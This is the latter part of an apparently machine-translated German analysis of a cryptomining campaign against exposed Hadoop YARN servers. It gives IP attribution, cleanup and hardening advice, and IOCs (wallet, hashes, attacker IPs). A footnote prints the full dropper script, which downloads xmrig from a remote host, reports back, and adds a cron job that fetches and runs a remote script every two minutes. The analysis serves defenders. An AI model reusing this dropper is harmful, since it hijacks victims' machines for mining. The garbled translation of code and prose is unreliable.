Sed ist einer Strom Herausgeber, wird verwendet, um Texttransformationen für einen Eingabestream (eine Datei oder Eingabe aus einer Pipeline) durchzuführen; Es ist die Fähigkeit von sed, Text in einer Pipeline zu filtern, die es von anderen Arten von Editoren besonders unterscheidet.
In diesem Zusammenhang wird es verwendet, um alle Spuren von Cron-Tasks zu beseitigen. Es gibt wahrscheinlich einige Einbruchsaktivitäten, die der Analyse nicht bekannt sind, da sie auf frühere Aktivitäten zurückzuführen sind, die sich dann geändert haben, um das erwartete Ergebnis zu erzielen.
Durch eine Analyse von IP-Adressen 192.99.142.232, 192.99.142.226, 192.99.142.248erhalten wir, dass das Referenzunternehmen (ISP) OVH Hosting mit Sitz in Kanada ist.
Alle verfügen über Konnektivität über Port 22, SSH. Wenn sie jedoch als IP-Adressen schädlicher Natur angesehen werden, beispielsweise durch Verweis auf das, was im Link gemeldet wird https://www. joesandbox.com/index.php/analysis/49178/0/executive , wo eine Verwendung von Powershell deklariert ist, bereichert die Suche und überprüft, ob die IP-Adresse 192.99.142.232 den gleichen Fingerabdruck hat wie die IP 85.214.102.143 in Deutschland in der Verfügbarkeit des ISP Strato AG. Die Adresse verfügt jedoch über ein Zertifikat 443.https.tls.certificate.parsed.fingerprint_sha1: 78e477a2406935666a2eac4e44646d2ffe0a6d9b, das sie auch mit den folgenden IPs verknüpft: 85.214.125.15 (emma.smartmessaging.com) Debian OS und mit der IP 85.214.60.153 XNUMX (meters.busware.de) Debian-Betriebssystem.
|
Aus |
Zum Fingerabdruck-SSH |
Fingerabdruck-TLS |
|
192.99.142.232 |
85.214.102.143 |
85.214.125.15 |
|
85.214.60.153 |
Was IP betrifft 192.99.142.248, verweisen wir auf die Abbildung unten, die hervorhebt, was bisher im Dokument zum Ausdruck gebracht wurde.
Für die andere IP-Adresse liegen Ihnen keine wesentlichen Details vor 192.99.142.226
Sicherheitshinweise
-
Verwenden Sie den oberen Teil, um den Prozess anzuzeigen und den abnormalen Prozess abzubrechen.
-
Überprüfen Sie die Verzeichnis /tmp und /var/tmp und löschen Sie die Datei wie Java, ppc, ppl3, config.json und w.conf
-
Überprüfen Sie die Aktivitätsliste von crontab und Anomalien beseitigen
-
Analysieren Sie YARN-Protokolle, bestätigen Sie abnormale Anwendungen und bereinigen Sie die Verarbeitung.
Sicherheitsverstärkung
-
Konfigurieren Sie Zugriffsrichtlinien über iptables oder Sicherheitsgruppen, um den Zugriff auf Ports wie 8088 einzuschränken;
-
Wenn dies nicht erforderlich ist, öffnen Sie die Schnittstelle nicht im öffentlichen Netzwerk und ändern Sie sie auf lokale oder Intranet-Anrufe.
-
Aktualisieren Sie Hadoop auf Version 2.x und aktivieren Sie die Kerberos-Authentifizierung, um anonymen Zugriff zu verhindern.
IOC
Wallet-Adresse
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
MD5
-
MD5 (xmrig_64) = c8c1f2da51fbd0aea60e11a81236c9dc
-
MD5 (xmrig_32) = 5110222de7330a371c83af67d46c4242
-
MD5 (xm64) = 183664ceb9c4d7179d5345249f1ee0c4
-
MD5 (xm32) = b00f4bbd82d2f5ec7c8152625684f853
-
MD5 (cr.sh) = 1e8c570de8acc2b7e864447c26c59b32
-
MD5 (cr.sh) = 48e79f8de26fa56d955a28c2de493132
-
MD5 (w.conf) = 777b79f6ae692d8047bcdee2c1af0fd6
-
MD5 (c.conf) = 9431791f1dfe856502dcd58f47ce5829
Adressen in der Reihenfolge ihrer Priorität
-
185.222.210.59 (entpuppt sich als Quell-IP);
-
46.30.43.159 (Anschluss an den Pool derEindringling, Stratum+TCP-Protokoll);
-
179.60.146.10 (Anschluss an den Pool derEindringling, Stratum+TCP-Protokoll);
-
95.142.40.83 (Datei-Download von Data Mining);
-
95.142.40.81 (Datei-Download von Data Mining);
-
46.30.42.162 (Datei-Download von Data Mining);
-
192.99.142.248 (Zusammenhang mit Umgehungsaktivitäten);
-
192.99.142.232 (Zusammenhang mit Umgehungsaktivitäten);
-
192.99.142.226 (Zusammenhang mit Umgehungsaktivitäten);
-
85.214.102.143 (Fingerabdruck Gemeinde mit oben aufgeführten Adressen);
-
85.214.125.15 (Fingerabdruck Gemeinde mit oben aufgeführten Adressen);
-
85.214.60.153 (Fingerabdruck Gemeinde mit den oben aufgeführten Adressen).
Adressen mutmaßlicher Zugehörigkeit zu den Verfügbarkeiten derEindringling
|
185.154.52.117 (vz230686.eurodir.ru) |
|
185.154.52.161 (piar60.ru) |
|
185.154.52.181 (vz224405.eurodir.ru) |
|
185.154.52.236 (supportt.ru) |
|
185.154.53.108 (vz224405.eurodir.ru) |
|
185.154.53.137 (vz224405.eurodir.ru) |
|
185.154.53.190 (vz228963.eurodir.ru) |
|
185.154.53.249 (vz232259.eurodir.ru) |
|
185.154.53.46 (server.badstudio.ru) |
|
185.154.53.65 (profshinservice.ru) |
|
185.154.53.67 (vz232259.eurodir.ru) |
|
185.154.53.72 (vz231895.eurodir.ru) |
|
46.30.41.182 (vz230501.eurodir.ru) |
|
46.30.41.207 (vz230806.eurodir.ru) |
|
46.30.41.51 (vz225213.eurodir.ru) |
|
46.30.41.80 (track.dev) |
|
46.30.42.162 (server.com) |
|
46.30.43.128 (vz228757.eurodir.ru) |
|
46.30.45.152 (vz230274.eurodir.ru) |
|
46.30.45.30 (shop.engine) |
|
46.30.45.91 (vz220153.eurodir.ru) |
|
46.30.47.115 (vz227413.eurodir.ru) |
|
46.30.47.157 (vz228859.eurodir.ru) |
|
95.142.39.109 (vz228627.eurodir.ru) |
|
95.142.39.151 (donotopen.ru) |
|
95.142.39.164 (vz232259.eurodir.ru) |
|
95.142.39.172 (gehostet von.wikhost.com) |
|
95.142.39.241 (shimshim.info) |
|
95.142.39.251 (vz232259.eurodir.ru) |
|
95.142.40.188 (vz232259.eurodir.ru) |
|
95.142.40.189 (vz232259.eurodir.ru) |
|
95.142.40.190 (vz232259.eurodir.ru) |
|
95.142.40.44 (vz229990.eurodir.ru) |
|
95.142.40.74 (vz232259.eurodir.ru) |
|
95.142.40.81 (vz228855.eurodir.ru) |
|
95.142.40.82 (vz228856.eurodir.ru) |
|
95.142.40.83 (vz228857.eurodir.ru) |
|
95.142.40.86 (kolos1952.ru) |
|
95.142.40.87 (register.ru) |
|
95.142.40.88 (buled.ru) |
|
95.142.40.89 (vz229526.eurodir.ru) |
|
95.142.39.233 (vz231616.eurodir.ru) |
|
185.154.53.46 (server.badstudio.ru) |
|
46.30.47.107 (vz227413.eurodir.ru) |
|
46.30.47.21 (vz227411.eurodir.ru) |
|
46.30.47.35 (vz227411.eurodir.ru) |
|
46.30.47.66 (vz227407.eurodir.ru) |
|
46.30.47.82 (vz227413.eurodir.ru) |
|
95.142.39.102 (vz222177.eurodir.ru) |
Schlussfolgerungen
Für diejenigen, die am Ende angelangt sind, ist es notwendig, abschließend zu betonen, wie Betriebssysteme verwendet wurden Standard wie Ubuntu und Windows 7.
Der gesamte Prozess wurde auch erfolgreich auf Betriebssystemen wie den oben genannten repliziert, und man könnte auch von IoT-Geräten ausgehen.
Ich glaube, dass es derzeit sehr kompliziert ist, eine ähnliche Bedrohung zu erkennen oder überhaupt zu erkennen, wenn sie auf das Internet der Dinge abzielt, angefangen bei der mangelnden Kenntnis der grundlegenden Systeme bis hin zur mangelnden Sicherheit derselben, aber vor allem bis hin zu den schlechten Sicherheitssystemen, mit denen wir das IoT des täglichen Gebrauchs verwalten können.
Leider habe ich zu keinem IoT Tests durchgeführt und kann daher nicht mit Sicherheit sagen, dass der gesamte beschriebene Prozess korrekt funktioniert.
Ich möchte mit einer Provokation schließen, indem ich einen weiteren Aspekt in Bezug auf die Verwendung von hervorhebe cryptominer. Tatsächlich kann nicht ausgeschlossen werden, dass Cyberkriminalität i cryptominer Kampagnen zu finanzieren Malware viel ausgefeilter, wie sie beispielsweise bei APTs vorkommen12 sogar halbstaatlichen Ursprungs, wenn man die Möglichkeit einer Selbstfinanzierung mit Zustimmung der Regierung in Betracht zieht, für die die „Hacker“-Gruppe arbeitet oder mit der sie zusammenarbeitet. Die Faktoren beziehen sich auf die vollständige Anonymität von Domain Operations Cyber, ermöglichen hohe Margen Täuschung, was diese Aktivitäten aus Sicht besonders profitabel macht Intelligenz, durch die Fähigkeit, einfach zu verwalten Operationen unter falscher Flagge und von "Adresse” die Namensnennung gegenüber Dritten, die nicht mit ihnen in Verbindung stehen.
Abschließend noch eine Überlegung zu den Schwierigkeiten, die mit der Durchführung dieser Analysen verbunden sind. Die Schwierigkeiten, die die Leser möglicherweise beim Lesen der Analyse empfunden haben, spiegeln die Schwierigkeiten bei der Durchführung wider. Wenn Sie jedoch eine nicht untergeordnete Rolle auf dem Cyber-Schachbrett spielen möchten, ist es wichtig, geschulte und aufmerksame Personen zu haben, die in der Lage sind, die erforderlichen Abhilfemaßnahmen auf realen Systemen zu analysieren und umzusetzen, die im Allgemeinen viel komplexer sind als das, das ich zu Bildungszwecken erstellt habe.
1 HDFS: HDFS steht für Hadoop Distributed File System. Es handelt sich um ein Dateisystem, das mit einer neuen Open-Source-Technologie erstellt wurde und ein hierarchisches System von Dateien und Verzeichnissen unterstützt, die auf den von Hadoop verwalteten Speicherknoten verteilt werden. Weitere Informationen: https://www. zerounoweb.it/techtarget/searchdatacenter/hadoop-significa-rendere-piu-economico-il-big-data-management-ecco-come/
2 REST API: Anwendungsprogrammierschnittstelle REpresentational State Transfer. Insgesamt handelt es sich hierbei um Hinweise des Code-Entwicklers, die hilfreich sind, um zu bestimmen, wie die von der Anwendung verwendeten Daten übermittelt werden sollen.
3 Im Allgemeinen sprechen wir von „Honey Pot“, wenn wir uns auf etwas beziehen, das speziell dafür geschaffen wurde, einen Angreifer anzulocken. In der Praxis handelt es sich dabei um eine Falle, die geschaffen wurde, um einen Angreifer dazu zu bringen, sich zu offenbaren.
4 Der Begriff Mining bezieht sich im Allgemeinen auf die Ausführung von Berechnungen, um durch die Ausführung komplexer Berechnungen Kryptowährungen zu schaffen.
5 Ein Crawler ist eine Software, die ein Netzwerk automatisch nach Schwachstellen durchsucht.
6 Ein Skript ist nichts anderes als eine Datei, die eine Folge von Befehlen enthält.
7 Insbesondere können Sie deutlich sehen, wie ein Skript namens heruntergeladen und ausgeführt wird cr.sh aus der IP-Adresse 185.222.210.59 und Sie verwenden den Befehl sch & verleugnen, d. h. Sie führen den Prozess innerhalb der Instanz von aus bash Klemmenstrom, in Hintergrund, aber der Prozess ist von der Liste losgelöst Jobs & Karriere di bash (d. h. der Prozess ist nicht als aufgeführt Bash-Job vorgestellt/Hintergrund); Daher wird es verwendet, um Jobs zu löschen/entfernen oder um der Shell mit dem Disavow-Befehl mitzuteilen, dass sie kein HUP-Signal senden soll.
8 pkill -f cryptonight
pkill -f hält an
pkill -f xmrig
pkill -f xmr-stak
pkill -f unterstützt
#ps ax|grep /tmp/yarn|grep -v grep|xargs kill -9
In diesem Teil des Codes geht es hauptsächlich um den Datenprozess Bergbau vorhanden, die zu bereinigenden Dokumente, die abzubrechenden Prozesse, aber wir haben sofort einen wichtigen Hinweis, Kryptonacht (Wir werden später sehen).
WGET="wget -O"
if [ -s /usr/bin/curl ];
dann
WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
dann
WGET="wget -O";
fi
f2="185.222.210.59"
In diesem zweiten Teil werden einige Variablen getestet und zugewiesen, um festzustellen, ob die Befehle vorhanden sind curl e wget und wenn ja, weisen Sie sie der WGET-Variablen zu, f2 weist einen IP-Wert zu.
Tatsächlich ist f2 eines davon Server Wird zum Herunterladen von Dateien verwendet, die mit der laufenden böswilligen Aktivität in Zusammenhang stehen.
downloadIfNeed()
{
Wenn [ ! -f /tmp/java ]; Dann
echo „Datei nicht gefunden!“
herunterladen
fi
if [ -x "$(command -v md5sum)" ]
dann
sum=$(md5sum /tmp/java | awk '{ print $1 }')
echo $summe
Fall $summe in
c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242)
echo „Java OK“
;;
*)
echo „Java falsch“
sizeBefore=$(du /tmp/java)
if [ -s /usr/bin/curl ];
dann
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
dann
WGET="wget --no-check-certificate -O ";
fi
$WGET /tmp/java https://transfer.sh/ixQBE/zzz
sumAfter=$(md5sum /tmp/java | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
dann
echo "redownloaded $sum $sizeBefore after $sumAfter " `du /tmp/java` > /tmp/tmp.txt
curl -F "file=@ /tmp/tmp.txt" http://$f2/re.php
fi
;;
esac
sonst
echo „Keine md5sum“
herunterladen
fi
}
herunterladen() {
f1=$(curl 185.222.210.59/g.php)
if [ -z "$f1" ];
dann
f1=$(wget -q -O - 185.222.210.59/g.php)
fi
if [ `getconf LONG_BIT` = "64" ]
dann
$WGET /tmp/java http://$f1/xmrig_64
sonst
$WGET /tmp/java http://$f1/xmrig_32
fi
}
Wenn [ ! "$(ps -fe|grep '/tmp/java -c /tmp/w.conf' |grep -v grep)" ];
dann
downloadIfNeed
chmod +x /tmp/java
$WGET /tmp/w.conf http://$f2/w.conf
nohup /tmp/java -c /tmp/w.conf > /dev/null 2>&1 &
Schlaf 5
rm -rf /tmp/w.conf
sonst
echo „Laufen“
fi
wenn crontab -l | grep -q "185.222.210.59"
dann
echo „Cron existiert“
sonst
echo „Cron nicht gefunden“
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
dann
LDR="curl";
fi
if [ -s /usr/bin/wget ];
dann
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "*/2 * * * * $LDR http:// 185.222.210.59/cr.sh | sh > /dev/null 2>&1") | Crontabs -
fi
Dieser dritte Teil des Codes bestimmt hauptsächlich, ob /tmp/java eine Datei ist, die existiert und in die geschrieben werden kann, und bestimmt dann, ob der MD5-Wert einem der im Code vorhandenen MD5-Werte entspricht (wir werden später sehen, welcher der beiden ist). Hash- Datei). Nell Skript, wird die Variable LDR zugewiesen. Diese Variable wird hauptsächlich zum Herunterladen des Verzeichnisses zum Speichern von Programmen verwendet Bergbau und andere über die Befehle wget oder curl, je nachdem, ob der eine oder andere Befehl auf dem Hostsystem vorhanden ist. Dieser Teil des Codes ist der Kern des Codes. Laden Sie ihn bei Bedarf herunter (mit der downloadIfNeed-Methode) und extrahieren Sie die ausführbare Datei für technische Daten Bergbau (Überprüfen Sie mit getconf LONG_BIT, ob die ausführbare Datei 32 oder 64 Bit sein muss), laden Sie die w.conf-Konfigurationsdatei herunter und fügen Sie dem Programm Ausführungsberechtigungen hinzu Bergbau und führt dann den Befehl nohup aus Hintergrund Bergbau (Nohup ist ein Befehl, der bewirkt, dass das SIGHUP-Signal ignoriert wird, um die Fortsetzung der Ausführung auch im Falle einer Trennung der Verbindung zum Terminal oder der Beendigung des Terminalemulators zu ermöglichen.
Planen und löschen Sie die Konfigurationsdatei, überprüfen Sie dann die Aufgaben in der Crontab. Wenn keine passende Aufgabe vorhanden ist, wird die Aufgabe heruntergeladen, um das hinzugefügte Skript „*/2 * * * * $LDR http:// 185.222.210.59/cr.sh | sh > /dev/null 2>&1“ auszuführen, wobei $LDR wget -q -O - oder curl (auch oben erwähnt) ist. Die Aufgabe wird alle zwei Minuten ausgeführt (wie in der Abbildung zu sehen ist, Bericht). die Optionen der Felder, die die Häufigkeit der Ausführung des Befehls angeben).
Lo Skript enthält Download-Methoden für mehrere verschachtelte Aufrufe. Die Eingabemethode scheint downloadIfNeed zu sein. Genauer gesagt besteht die Hauptfunktion dieser Methode darin, MD5 des Datumsprogramms zu überprüfen Bergbau vorhanden, wenn es nicht überprüft werden kann oder die Datei nicht existiert, rufen Sie direkt die Download-Methode auf (zweite Methode in der Skript), um das Programm herunterzuladen Bergbau Wenn die Datei vorhanden ist, MD5 jedoch nicht korrekt übereinstimmt, rufen Sie die Download-Methode auf. Wenn die Überprüfung nach der erneuten Überprüfung fehlschlägt, versuchen Sie bitte, das Mining-Programm von einem anderen Download-Kanal https://transfer.sh/WoGXx/zzz herunterzuladen, und überprüfen Sie die Überprüfung erneut. Abschließend werden die relevanten Ergebnisse an re.php $f2 des Zielservers gemeldet.
Falls vorhanden, lautet der Replikatname Java.
Die download()-Methode beurteilt, ob das System die entsprechende Version des Programms herunterlädt Bergbau von der folgenden Webressource: http:// 185.222.210.59/g.php.
Die Ressource gibt eine andere IP-Adresse zum Herunterladen der ausführbaren Hauptdatei zurück. Nach Abschluss des Downloads wird sie erneut überprüft und die Kopie in ppc umbenannt.
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
crontab -l | sed '/logo4/d' | Crontabs -
crontab -l | sed '/logo9/d' | Crontabs -
crontab -l | sed '/logo0/d' | Crontabs -
Im letzten Teil des Skripts gibt es einige Prozesse, Dateien, Crontab-Bereinigungsprozesse, die Verwendung von pkill, um den Prozess abzubrechen, der die Bedingungen erfüllt, und einige Aktivitäten in der Crontab zu löschen.
9 Open-Source-Informationen
10 https:// community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html oppure https:// stackoverflow.com/questions/50520658/its-seem-that-the-yarn-is-infected-by-trojan-even-if-i-reinstall-my-computer
11 Fernprozeduraufrufist ein allgemeiner Mechanismus zur Verwaltung von Anwendungen Client-Server.
12 Advanced und Persistent Threath, Art von Angriffen, die im Allgemeinen von staatsähnlichen Organisationen durchgeführt werden.
(Foto: US-Verteidigungsministerium)
